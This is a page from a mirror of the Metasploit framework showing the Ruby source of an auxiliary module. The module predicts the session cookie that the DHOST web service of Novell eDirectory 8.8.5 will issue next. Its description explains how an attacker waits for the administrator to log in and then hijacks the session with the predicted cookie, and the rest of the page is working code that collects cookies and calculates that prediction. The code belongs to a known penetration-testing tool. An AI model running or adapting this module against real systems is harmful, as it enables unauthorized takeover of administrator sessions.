Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

edirectory_dhost_cookie.rb 2.1KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. class MetasploitModule < Msf::Auxiliary
  6. include Msf::Exploit::Remote::Tcp
  7. def initialize(info = {})
  8. super(update_info(info,
  9. 'Name' => 'Novell eDirectory DHOST Predictable Session Cookie',
  10. 'Description' => %q{
  11. This module is able to predict the next session cookie value issued
  12. by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
  13. this module, wait until the real administrator logs in, then specify the
  14. predicted cookie value to hijack their session.
  15. },
  16. 'References' =>
  17. [
  18. ['OSVDB', '60035'],
  19. ],
  20. 'Author' => 'hdm',
  21. 'License' => MSF_LICENSE
  22. ))
  23. register_options([
  24. Opt::RPORT(8030),
  25. OptBool.new('SSL', [true, 'Use SSL', true])
  26. ])
  27. end
  28. def run
  29. vals = []
  30. name = ""
  31. print_status("Making 5 requests to verify predictions...")
  32. 1.upto(6) do
  33. connect
  34. req = "GET /dhost/ HTTP/1.1\r\n"
  35. req << "Host: #{rhost}:#{rport}\r\n"
  36. req << "Connection: close\r\n\r\n"
  37. sock.put(req)
  38. res = sock.get_once(-1,5)
  39. disconnect
  40. cookie = nil
  41. if(res and res =~ /Cookie:\s*([^\s]+)\s*/mi)
  42. cookie = $1
  43. cookie,junk = cookie.split(';')
  44. name,cookie = cookie.split('=')
  45. cookie = cookie.to_i(16)
  46. vals << cookie
  47. end
  48. end
  49. deltas = []
  50. prev_val = nil
  51. vals.each_index do |i|
  52. if(i > 0)
  53. delta = vals[i] - prev_val
  54. print_status("Cookie: #{i} #{"%.8x" % vals[i]} DELTA #{"%.8x" % delta}")
  55. deltas << delta
  56. end
  57. prev_val = vals[i]
  58. end
  59. deltas.uniq!
  60. if(deltas.length < 4)
  61. print_status("The next cookie value will be: #{name}=#{"%.8x" % (prev_val + deltas[0])}")
  62. else
  63. print_status("The cookie value is less predictable, maybe this has been patched?")
  64. print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}")
  65. end
  66. end
  67. end